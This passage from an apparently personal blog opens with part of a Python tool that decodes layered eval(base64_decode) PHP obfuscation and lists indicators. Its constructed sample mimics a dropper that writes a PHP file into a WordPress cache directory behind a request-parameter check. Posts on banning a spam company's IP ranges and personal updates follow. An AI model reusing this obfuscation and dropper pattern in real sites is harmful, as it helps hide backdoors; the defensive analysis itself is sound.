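    """Return each cleaned layer, outermost first. Decodes only; nothing is executed."""
    layers = [strip_noise(php)]
    while len(layers) < max_layers:
        m = B64_CALL.search(layers[-1])
        if not m:
            break
        decoded = base64.b64decode(m.group(1)).decode("latin-1")
        layers.append(strip_noise(decoded))
    return layers

def indicators(layers):
    """Pull out what a defender would search for: files written and request parameters read."""
    text = "\n".join(layers)
    return {
        "files_written": re.findall(r"fopen\('([^']+)','w'\)", text),
        "request_params": sorted(set(re.findall(r"\$_REQUEST\['([^']+)'\]", text))),
    }

def _wrap(php):
    """Fixture helper: one eval(base64_decode(...)) layer with junk comments and a split string."""
    b64 = base64.b64encode(php.encode()).decode()
    mid = len(b64) // 2
    return "eval/*a*b*/(/*c*/base64_decode/*d*/('%s'/*e*/./*f*/'%s'));" % (b64[:mid], b64[mid:])

def constructed_sample():
    """Constructed, harmless input shaped like the spam comment (names are made up)."""
    inner = "/*g*/if/*h*/(isset($_REQUEST['de'/*i*/./*j*/'mo']))/*k*/echo('constructed');"
    stage = "<?php " + _wrap(inner).replace("'", "\\'") + " ?>"
    return _wrap("if($f=fopen('wp-content/cache/constructed.php','w'))"
                 "{fputs($f,'" + stage + "');fclose($f);}")

if __name__ == "__main__":
    layers = peel(constructed_sample())
    for depth, layer in enumerate(layers):
        print(depth, layer)
    print(indicators(layers))
```

The file path and parameter name it reports are the two things to look for on a server: an unexpected PHP file under the cache directory, and requests carrying that parameter.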
terriko: (Pi)
[personal profile] terriko
I maintain a couple of blogs outside of this one, and the most popular one I'm involved with gets a lot of spam. There seemed to be a particular uptick about a month back, and I went to look into it.

What I discovered is that quite a lot of our spam (around 80%) was coming from one company called IPTelligent LLC. There's no easy way for me to tell if they are a legit company who simply have the worst IT staff in the history of IT staffs and all of their machines are compromised, or if they are, in fact, evil jerks who are repeatedly attempting to pollute the internet with really terrible spam. Given a short websearch, it seems pretty likely that IPTelligent is intentionally evil. I suppose one could argue that the level of incompetence displayed by someone who not only runs that many compromised machines but also serves up malware consistently is a form of evil even if it wasn't intentional. Whatever.

Either way, they are responsible for a rather large percentage of the spam we were receiving, and not responsible for any legit visits that we could see.

Since this particular blog uses Wordpress, solving the problem was pretty simple. Wordpress has built in lists for blocking comments, but they simply send to the moderation queue, as does popular plugin Akismet. Since we were seeing hundreds of messages per day from IPTelligent, I needed something that banned them more completely so our moderators wouldn't even see the messages and have to scan through them. Thankfully, there are lots of plugins for this. I settled on one called wp-ban that seems to be working well for my needs.

Once that's installed, the settings are under Settings->Ban. At the top of my list, I now have

# IPTelligent owns these ips, and they seem to be a spam company
96.47.225.*
173.44.37.*
96.47.224.*


Which covers the majority of the IPs that were hitting us with spam. A glance at a more specific list of IPTelligent IPs suggests that those lines are good enough right now, although it's possible that they'll buy more IP blocks eventually. (We also have a longer list of other IPs that appear to be compromised and were causing problems, but they look more like temporary compromises than intentional, long-term malice so I'm not listing those IPs here).

Of course, it would be better if someone took the company to court for this. I am not a lawyer, but it seems to me that the Computer Fraud and Abuse Act must cover at least some portion of their activities. I mean, the things they charged Aaron Swartz with under that act seem less sketchy than what IPTelligent is doing. But court cases take time and money, and banning them right now is pretty easy, so I figured I'd share the short-term solution in case it's useful to anyone who'd like to get a little less spam right away. (We are indeed getting ~80% less spam since the bans went into place.)

For the record, here's the company info as I get from the whois database right now:

OrgName:        IPTelligent LLC
OrgId:          IPTEL-1
Address:        2115 NW 22nd Street
Address:        #C110
City:           Miami
StateProv:      FL
PostalCode:     33142
Country:        US
RegDate:        2009-03-31
Updated:        2012-07-16
Ref:            http://whois.arin.net/rest/org/IPTEL-1

ReferralServer: rwhois://rwhois.iptelligent.com:4321

OrgNOCHandle: NOC3572-ARIN
OrgNOCName:   Network Operations Center
OrgNOCPhone:  +1-888-638-5893
OrgNOCEmail:  sysop@iptelligent.com
OrgNOCRef:    http://whois.arin.net/rest/poc/NOC3572-ARIN

Updates and links

May. 6th, 2013 10:38 am
terriko: Yup, I took this one. The eyes are paper, not photoshop (chair)
[personal profile] terriko
First some me-related updates:


  • I got to help staff a table at roborave on Saturday. Fun! I was too busy to take pictures, so don't ask.

  • GSoC ranking continues apace. It's actually less busy for me than it was, since I don't need to interact with the students as much until selection is finished, so I've gone from over a hundred people potentially wanting to talk to me to something closer to 20-30. (project admins + mentors with melange trouble). I expect there'll be some wrangling to make sure the Systers and Mailman don't have any overlapping project ideas, but that can wait a few days.

  • To save people from asking me: I'm not expecting to hear about the Portland job for another couple of weeks. This is actually pretty convenient for me since it means I can focus on GSoC during the selection period; hooray for good timing!



And then some links that amused me:

Page generated May. 20th, 2013 05:28 am